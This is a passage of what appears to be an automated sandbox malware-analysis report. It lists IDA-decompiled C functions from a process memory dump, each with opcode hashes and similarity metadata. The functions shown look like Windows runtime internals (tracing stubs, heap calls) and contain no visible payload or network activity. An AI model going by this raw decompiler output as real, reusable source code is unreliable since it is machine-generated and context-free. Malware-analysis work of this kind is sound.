                    				}
                    				return _t10;
                    			}








                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1ed168972eaf0e4d64bf997ef3c29c19d0248853754684de2fe761485525262f
                    • Instruction ID: a04afd88a2cce58ac3abd5595d013730342d85672029f3bc1880d425a27d8b59
                    • Opcode Fuzzy Hash: 1ed168972eaf0e4d64bf997ef3c29c19d0248853754684de2fe761485525262f
                    • Instruction Fuzzy Hash: 2B017C72241946BFD351BB79CD90E13F7ADEB95660B00026DF51887A12CB64EC11C6E8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 61%
                    			E0172138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                    				signed int _v8;
                    				intOrPtr _v16;
                    				intOrPtr _v20;
                    				intOrPtr _v24;
                    				intOrPtr _v28;
                    				short _v54;
                    				char _v60;
                    				void* __edi;
                    				void* __esi;
                    				signed char* _t21;
                    				intOrPtr _t27;
                    				intOrPtr _t33;
                    				intOrPtr _t34;
                    				signed int _t35;
                    
                    				_t32 = __edx;
                    				_t27 = __ebx;
                    				_v8 =  *0x175d360 ^ _t35;
                    				_t33 = __edx;
                    				_t34 = __ecx;
                    				E016AFA60( &_v60, 0, 0x30);
                    				_v20 = _a4;
                    				_v16 = _a8;
                    				_v28 = _t34;
                    				_v24 = _t33;
                    				_v54 = 0x1033;
                    				if(E01687D50() == 0) {
                    					_t21 = 0x7ffe0388;
                    				} else {
                    					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                    				}
                    				_push( &_v60);
                    				_push(0x10);
                    				_push(0x20402);
                    				_push( *_t21 & 0x000000ff);
                    				return E016AB640(E016A9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                    			}


















                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 956912b67dc309ce9e587299f42e4d34db82378bb52b561b4728639069349e1f
                    • Instruction ID: d9131b5fdaf5e369e79318e55db44cf55a15dac3df8dd8a7d52c884c0aefb36d
                    • Opcode Fuzzy Hash: 956912b67dc309ce9e587299f42e4d34db82378bb52b561b4728639069349e1f
                    • Instruction Fuzzy Hash: 76019E71A00258AFCB10EFA8D841EAEBBB8EF44710F40406AF900EB281DA709E01CB94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 61%
                    			E017214FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                    				signed int _v8;
                    				intOrPtr _v16;
                    				intOrPtr _v20;
                    				intOrPtr _v24;
                    				intOrPtr _v28;
                    				short _v54;
                    				char _v60;
                    				void* __edi;
                    				void* __esi;
                    				signed char* _t21;
                    				intOrPtr _t27;
                    				intOrPtr _t33;
                    				intOrPtr _t34;
                    				signed int _t35;
                    
                    				_t32 = __edx;
                    				_t27 = __ebx;
                    				_v8 =  *0x175d360 ^ _t35;
                    				_t33 = __edx;
                    				_t34 = __ecx;
                    				E016AFA60( &_v60, 0, 0x30);
                    				_v20 = _a4;
                    				_v16 = _a8;
                    				_v28 = _t34;
                    				_v24 = _t33;
                    				_v54 = 0x1034;
                    				if(E01687D50() == 0) {
                    					_t21 = 0x7ffe0388;
                    				} else {
                    					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                    				}
                    				_push( &_v60);
                    				_push(0x10);
                    				_push(0x20402);
                    				_push( *_t21 & 0x000000ff);
                    				return E016AB640(E016A9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                    			}


















                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: acdd72008dd1d8e75a73587ac8727229e8acddb582c0edd157c1f8f8f302433c
                    • Instruction ID: e4247d74cf482450fd8298dfd940c7c7e3febbeef25f584dceacf9d1fc818b30
                    • Opcode Fuzzy Hash: acdd72008dd1d8e75a73587ac8727229e8acddb582c0edd157c1f8f8f302433c
                    • Instruction Fuzzy Hash: 5B019271A00258EFCB10DFA9D851EAEBBB8EF44710F50409AF914EB280D670DE01CB94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 91%
                    			E016658EC(intOrPtr __ecx) {
                    				signed int _v8;
                    				char _v28;
                    				char _v44;
                    				char _v76;
                    				void* __edi;
                    				void* __esi;
                    				intOrPtr _t10;
                    				intOrPtr _t16;
                    				intOrPtr _t17;
                    				intOrPtr _t27;
                    				intOrPtr _t28;
                    				signed int _t29;
                    
                    				_v8 =  *0x175d360 ^ _t29;
                    				_t10 =  *[fs:0x30];
                    				_t27 = __ecx;
                    				if(_t10 == 0) {
                    					L6:
                    					_t28 = 0x1645c80;
                    				} else {
                    					_t16 =  *((intOrPtr*)(_t10 + 0x10));
                    					if(_t16 == 0) {
                    						goto L6;
                    					} else {
                    						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
                    					}
                    				}
                    				if(E01665943() != 0 &&  *0x1755320 > 5) {
                    					E016E7B5E( &_v44, _t27);
                    					_t22 =  &_v28;
                    					E016E7B5E( &_v28, _t28);
                    					_t11 = E016E7B9C(0x1755320, 0x164bf15,  &_v28, _t22, 4,  &_v76);
                    				}
                    				return E016AB640(_t11, _t17, _v8 ^ _t29, 0x164bf15, _t27, _t28);
                    			}
















                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d8b6fe452f1bb7d7c1af8eecc727c6aa8896f5a4e03390573b05f69a8ca93b8e
                    • Instruction ID: 6431a6abfc51c03322c0aaaec2e38b12e1db318287f0c87af89898eb22059c4d
                    • Opcode Fuzzy Hash: d8b6fe452f1bb7d7c1af8eecc727c6aa8896f5a4e03390573b05f69a8ca93b8e
                    • Instruction Fuzzy Hash: 7101F231B00145DBCB24EE68DC069AF7BAEEF41170F8402AD9A0A97344DF70ED02C794
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E01731074(intOrPtr __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
                    				char _v8;
                    				void* _v11;
                    				unsigned int _v12;
                    				void* _v15;
                    				void* __esi;
                    				void* __ebp;
                    				char* _t16;
                    				signed int* _t35;
                    
                    				_t22 = __ebx;
                    				_t35 = __ecx;
                    				_v8 = __edx;
                    				_t13 =  !( *__ecx) + 1;
                    				_v12 =  !( *__ecx) + 1;
                    				if(_a4 != 0) {
                    					E0173165E(__ebx, 0x1758ae4, (__edx -  *0x1758b04 >> 0x14) + (__edx -  *0x1758b04 >> 0x14), __edi, __ecx, (__edx -  *0x1758b04 >> 0x14) + (__edx -  *0x1758b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
                    				}
                    				E0172AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
                    				if(E01687D50() == 0) {
                    					_t16 = 0x7ffe0388;
                    				} else {
                    					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                    				}
                    				if( *_t16 != 0) {
                    					_t16 = E0171FE3F(_t22, _t35, _v8, _v12);
                    				}
                    				return _t16;
                    			}












                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b70be61707b81cec197874ce7d078ae2f64f235b66109ed907d70a0cf127a882
                    • Instruction ID: c2b11d29febdf03ac4da59ae9c14fff6fa6b9edf94942fce5bd085d68e8bd362
                    • Opcode Fuzzy Hash: b70be61707b81cec197874ce7d078ae2f64f235b66109ed907d70a0cf127a882
                    • Instruction Fuzzy Hash: F2014772604746DFC710EF69C944B1AFBE9ABC4310F04C629F98583695EE70D945CBA2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0167B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
                    				signed char _t11;
                    				signed char* _t12;
                    				intOrPtr _t24;
                    				signed short* _t25;
                    
                    				_t25 = __edx;
                    				_t24 = __ecx;
                    				_t11 = ( *[fs:0x30])[0x50];
                    				if(_t11 != 0) {
                    					if( *_t11 == 0) {
                    						goto L1;
                    					}
                    					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
                    					L2:
                    					if( *_t12 != 0) {
                    						_t12 =  *[fs:0x30];
                    						if((_t12[0x240] & 0x00000004) == 0) {
                    							goto L3;
                    						}
                    						if(E01687D50() == 0) {
                    							_t12 = 0x7ffe0385;
                    						} else {
                    							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
                    						}
                    						if(( *_t12 & 0x00000020) == 0) {
                    							goto L3;
                    						}
                    						return E016E7016(_a4, _t24, 0, 0, _t25, 0);
                    					}
                    					L3:
                    					return _t12;
                    				}
                    				L1:
                    				_t12 = 0x7ffe0384;
                    				goto L2;
                    			}








                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                    • Instruction ID: a10056e343324e1289da033afcdc94a5736136057cc37bcf33c9b9044c03a4ca
                    • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                    • Instruction Fuzzy Hash: 4A017C722019849FE3238B5DCD88F767BD8EF95A50F0900A5FA19CBB52E728DC81C624
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 59%
                    			E0171FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                    				signed int _v12;
                    				intOrPtr _v24;
                    				intOrPtr _v28;
                    				intOrPtr _v32;
                    				short _v58;
                    				char _v64;
                    				void* __edi;
                    				void* __esi;
                    				signed char* _t18;
                    				intOrPtr _t24;
                    				intOrPtr _t30;
                    				intOrPtr _t31;
                    				signed int _t32;
                    
                    				_t29 = __edx;
                    				_t24 = __ebx;
                    				_v12 =  *0x175d360 ^ _t32;
                    				_t30 = __edx;
                    				_t31 = __ecx;
                    				E016AFA60( &_v64, 0, 0x30);
                    				_v24 = _a4;
                    				_v32 = _t31;
                    				_v28 = _t30;
                    				_v58 = 0x267;
                    				if(E01687D50() == 0) {
                    					_t18 = 0x7ffe0388;
                    				} else {
                    					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                    				}
                    				_push( &_v64);
                    				_push(0x10);
                    				_push(0x20402);
                    				_push( *_t18 & 0x000000ff);
                    				return E016AB640(E016A9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                    			}

















                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9b40a48a5f12bfc3378af967b9cae58988c96740af0addf88ee3df839fadb186
                    • Instruction ID: 20048c375b5a0f52742f0ea72ff1df93d6f01a6598f0de6fbfe783fb2db362b7
                    • Opcode Fuzzy Hash: 9b40a48a5f12bfc3378af967b9cae58988c96740af0addf88ee3df839fadb186
                    • Instruction Fuzzy Hash: A5018471A00259ABDB14DFA9D855FAEBBB9EF44710F40406AF900AB281DA709905CB99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 59%
                    			E0171FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                    				signed int _v12;
                    				intOrPtr _v24;
                    				intOrPtr _v28;
                    				intOrPtr _v32;
                    				short _v58;
                    				char _v64;
                    				void* __edi;
                    				void* __esi;
                    				signed char* _t18;
                    				intOrPtr _t24;
                    				intOrPtr _t30;
                    				intOrPtr _t31;
                    				signed int _t32;
                    
                    				_t29 = __edx;
                    				_t24 = __ebx;
                    				_v12 =  *0x175d360 ^ _t32;
                    				_t30 = __edx;
                    				_t31 = __ecx;
                    				E016AFA60( &_v64, 0, 0x30);
                    				_v24 = _a4;
                    				_v32 = _t31;
                    				_v28 = _t30;
                    				_v58 = 0x266;
                    				if(E01687D50() == 0) {
                    					_t18 = 0x7ffe0388;
                    				} else {
                    					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                    				}
                    				_push( &_v64);
                    				_push(0x10);
                    				_push(0x20402);
                    				_push( *_t18 & 0x000000ff);
                    				return E016AB640(E016A9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                    			}

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a71cd2d0590dc4854f66d23902c97d48d1283a2b4050fd5d0e951c146dd33dd7
                    • Instruction ID: c3c0a5c6b393d8b6ff22c341a3d0b8b7cac586d1885ae7e8ba575b7e7bf0171f
                    • Opcode Fuzzy Hash: a71cd2d0590dc4854f66d23902c97d48d1283a2b4050fd5d0e951c146dd33dd7
                    • Instruction Fuzzy Hash: 74018871A00219ABDB14DFA9D845FAEB7B8EF45710F40406AF9009B280D9709901CB95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 54%
                    			E01738A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                    				signed int _v12;
                    				intOrPtr _v24;
                    				intOrPtr _v28;
                    				intOrPtr _v32;
                    				intOrPtr _v36;
                    				intOrPtr _v40;
                    				short _v66;
                    				char _v72;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				signed char* _t18;
                    				signed int _t32;
                    
                    				_t29 = __edx;
                    				_v12 =  *0x175d360 ^ _t32;
                    				_t31 = _a8;
                    				_t30 = _a12;
                    				_v66 = 0x1c20;
                    				_v40 = __ecx;
                    				_v36 = __edx;
                    				_v32 = _a4;
                    				_v28 = _a8;
                    				_v24 = _a12;
                    				if(E01687D50() == 0) {
                    					_t18 = 0x7ffe0386;
                    				} else {
                    					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                    				}
                    				_push( &_v72);
                    				_push(0x14);
                    				_push(0x20402);
                    				_push( *_t18 & 0x000000ff);
                    				return E016AB640(E016A9AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
                    			}

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 93f6d1c36230ddf034c3dc97bf340269f9a3956de9e89b51575aae9b47bc86ba
                    • Instruction ID: a223e54387ccc3eb3b7df9c8f3e239b04bb4abfbfec5cbadc8b10c5148c7f50b
                    • Opcode Fuzzy Hash: 93f6d1c36230ddf034c3dc97bf340269f9a3956de9e89b51575aae9b47bc86ba
                    • Instruction Fuzzy Hash: 91012C71A0021DAFCB00DFA9D9419AEBBB8EF58310F50415AFA05E7341D634AE01CBA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 54%
                    			E01738ED6(intOrPtr __ecx, intOrPtr __edx) {
                    				signed int _v8;
                    				signed int _v12;
                    				intOrPtr _v16;
                    				intOrPtr _v20;
                    				intOrPtr _v24;
                    				intOrPtr _v28;
                    				intOrPtr _v32;
                    				intOrPtr _v36;
                    				short _v62;
                    				char _v68;
                    				signed char* _t29;
                    				intOrPtr _t35;
                    				intOrPtr _t41;
                    				intOrPtr _t42;
                    				signed int _t43;
                    
                    				_t40 = __edx;
                    				_v8 =  *0x175d360 ^ _t43;
                    				_v28 = __ecx;
                    				_v62 = 0x1c2a;
                    				_v36 =  *((intOrPtr*)(__edx + 0xc8));
                    				_v32 =  *((intOrPtr*)(__edx + 0xcc));
                    				_v20 =  *((intOrPtr*)(__edx + 0xd8));
                    				_v16 =  *((intOrPtr*)(__edx + 0xd4));
                    				_v24 = __edx;
                    				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
                    				if(E01687D50() == 0) {
                    					_t29 = 0x7ffe0386;
                    				} else {
                    					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                    				}
                    				_push( &_v68);
                    				_push(0x1c);
                    				_push(0x20402);
                    				_push( *_t29 & 0x000000ff);
                    				return E016AB640(E016A9AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
                    			}

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3c0e54a8c36812c976b8ec12e843fdb925b19818138fa9a3771d7717b73b2647
                    • Instruction ID: a8598fca6e78da66cda0c88f44513fbf88d3a411b4a209fedf23161b7f9eb8b5
                    • Opcode Fuzzy Hash: 3c0e54a8c36812c976b8ec12e843fdb925b19818138fa9a3771d7717b73b2647
                    • Instruction Fuzzy Hash: 88111271A0025ADFDB04DFA8D541BADF7F4FF08300F5442AAE518EB342D6349940CB94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0166DB60(signed int __ecx) {
                    				intOrPtr* _t9;
                    				void* _t12;
                    				void* _t13;
                    				intOrPtr _t14;
                    
                    				_t9 = __ecx;
                    				_t14 = 0;
                    				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
                    					_t13 = 0xc000000d;
                    				} else {
                    					_t14 = E0166DB40();
                    					if(_t14 == 0) {
                    						_t13 = 0xc0000017;
                    					} else {
                    						_t13 = E0166E7B0(__ecx, _t12, _t14, 0xfff);
                    						if(_t13 < 0) {
                    							L0166E8B0(__ecx, _t14, 0xfff);
                    							L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
                    							_t14 = 0;
                    						} else {
                    							_t13 = 0;
                    							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
                    						}
                    					}
                    				}
                    				 *_t9 = _t14;
                    				return _t13;
                    			}

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                    • Instruction ID: 1fd86b6f9a436c9055daeac62d907a081321f541a3f91747c53cd44f845563cf
                    • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                    • Instruction Fuzzy Hash: 00F0FC737015239BD3326AD98C80F27BA9ECFE2A60F1A0039F2459B34CCF608C0286D4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0166B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
                    				signed char* _t13;
                    				intOrPtr _t22;
                    				char _t23;
                    
                    				_t23 = __edx;
                    				_t22 = __ecx;
                    				if(E01687D50() != 0) {
                    					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
                    				} else {
                    					_t13 = 0x7ffe0384;
                    				}
                    				if( *_t13 != 0) {
                    					_t13 =  *[fs:0x30];
                    					if((_t13[0x240] & 0x00000004) == 0) {
                    						goto L3;
                    					}
                    					if(E01687D50() == 0) {
                    						_t13 = 0x7ffe0385;
                    					} else {
                    						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
                    					}
                    					if(( *_t13 & 0x00000020) == 0) {
                    						goto L3;
                    					}
                    					return E016E7016(0x14a4, _t22, _t23, _a4, _a8, 0);
                    				} else {
                    					L3:
                    					return _t13;
                    				}
                    			}

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                    • Instruction ID: 1466c64ee6d8f355744afe0b18af217e5eca5f6549455ffa0e29540c7b32be13
                    • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                    • Instruction Fuzzy Hash: 74016D32200680EBD322969DCC18B69BBDDEF91B54F0940A5EE14CB7A6DB79C801C259
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 46%
                    			E016FFE87(intOrPtr __ecx) {
                    				signed int _v8;
                    				intOrPtr _v16;
                    				intOrPtr _v20;
                    				signed int _v24;
                    				intOrPtr _v28;
                    				short _v54;
                    				char _v60;
                    				signed char* _t21;
                    				intOrPtr _t27;
                    				intOrPtr _t32;
                    				intOrPtr _t33;
                    				intOrPtr _t34;
                    				signed int _t35;
                    
                    				_v8 =  *0x175d360 ^ _t35;
                    				_v16 = __ecx;
                    				_v54 = 0x1722;
                    				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
                    				_v28 =  *((intOrPtr*)(__ecx + 4));
                    				_v20 =  *((intOrPtr*)(__ecx + 0xc));
                    				if(E01687D50() == 0) {
                    					_t21 = 0x7ffe0382;
                    				} else {
                    					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
                    				}
                    				_push( &_v60);
                    				_push(0x10);
                    				_push(0x20402);
                    				_push( *_t21 & 0x000000ff);
                    				return E016AB640(E016A9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                    			}

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: de2dc8c136b7efa78ecceed0fe5bffc2c91533249751f4079fe5f4b136dc5335
                    • Instruction ID: 98156dffae0005c46519031b1358a8cd979761c2e8030c030ca84630e96864df
                    • Opcode Fuzzy Hash: de2dc8c136b7efa78ecceed0fe5bffc2c91533249751f4079fe5f4b136dc5335
                    • Instruction Fuzzy Hash: 74016271A00209EFCB14DFA8D941A6EB7F5EF04704F50419DA914DB382D635D901CB44
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 48%
                    			E0172131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                    				signed int _v8;
                    				intOrPtr _v12;
                    				intOrPtr _v16;
                    				intOrPtr _v20;
                    				intOrPtr _v24;
                    				short _v50;
                    				char _v56;
                    				signed char* _t18;
                    				intOrPtr _t24;
                    				intOrPtr _t30;
                    				intOrPtr _t31;
                    				signed int _t32;
                    
                    				_t29 = __edx;
                    				_v8 =  *0x175d360 ^ _t32;
                    				_v20 = _a4;
                    				_v12 = _a8;
                    				_v24 = __ecx;
                    				_v16 = __edx;
                    				_v50 = 0x1021;
                    				if(E01687D50() == 0) {
                    					_t18 = 0x7ffe0380;
                    				} else {
                    					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                    				}
                    				_push( &_v56);
                    				_push(0x10);
                    				_push(0x20402);
                    				_push( *_t18 & 0x000000ff);
                    				return E016AB640(E016A9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                    			}

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 186078ffef71b2f362ef857f7cc5f6848721cb2859d4a082d09f43df683b74f2
                    • Instruction ID: 152912188b8b0672449db9954cf6c52f8e0e39499792e1032710a823b73db83e
                    • Opcode Fuzzy Hash: 186078ffef71b2f362ef857f7cc5f6848721cb2859d4a082d09f43df683b74f2
                    • Instruction Fuzzy Hash: 0B013171A01259AFCB04EFA9D945AAEB7F5FF18700F504059F905EB341E6749A00CB54
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 48%
                    			E01738F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                    				signed int _v8;
                    				intOrPtr _v12;
                    				intOrPtr _v16;
                    				intOrPtr _v20;
                    				intOrPtr _v24;
                    				short _v50;
                    				char _v56;
                    				signed char* _t18;
                    				intOrPtr _t24;
                    				intOrPtr _t30;
                    				intOrPtr _t31;
                    				signed int _t32;
                    
                    				_t29 = __edx;
                    				_v8 =  *0x175d360 ^ _t32;
                    				_v16 = __ecx;
                    				_v50 = 0x1c2c;
                    				_v24 = _a4;
                    				_v20 = _a8;
                    				_v12 = __edx;
                    				if(E01687D50() == 0) {
                    					_t18 = 0x7ffe0386;
                    				} else {
                    					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                    				}
                    				_push( &_v56);
                    				_push(0x10);
                    				_push(0x402);
                    				_push( *_t18 & 0x000000ff);
                    				return E016AB640(E016A9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                    			}

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f6e929668a4d2608cfbc833fdced051dd576ce44dc8b8fb90c7742e383245c7d
                    • Instruction ID: 37ede3cdb9cc4eea685de6422e99033cdb116717c82910c5e62b585c56846921
                    • Opcode Fuzzy Hash: f6e929668a4d2608cfbc833fdced051dd576ce44dc8b8fb90c7742e383245c7d
                    • Instruction Fuzzy Hash: 0C014475A0020DEFDB00EFA8D945AAEB7F5EF58300F504159B905EB381DA74DA00CB95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 46%
                    			E01721608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                    				signed int _v8;
                    				intOrPtr _v12;
                    				intOrPtr _v16;
                    				intOrPtr _v20;
                    				short _v46;
                    				char _v52;
                    				signed char* _t15;
                    				intOrPtr _t21;
                    				intOrPtr _t27;
                    				intOrPtr _t28;
                    				signed int _t29;
                    
                    				_t26 = __edx;
                    				_v8 =  *0x175d360 ^ _t29;
                    				_v12 = _a4;
                    				_v20 = __ecx;
                    				_v16 = __edx;
                    				_v46 = 0x1024;
                    				if(E01687D50() == 0) {
                    					_t15 = 0x7ffe0380;
                    				} else {
                    					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                    				}
                    				_push( &_v52);
                    				_push(0xc);
                    				_push(0x20402);
                    				_push( *_t15 & 0x000000ff);
                    				return E016AB640(E016A9AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
                    			}

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0df088ac16afc3c0e3e841d4a6adecbbbfc3086c4859811a3e4e51b0af53980d
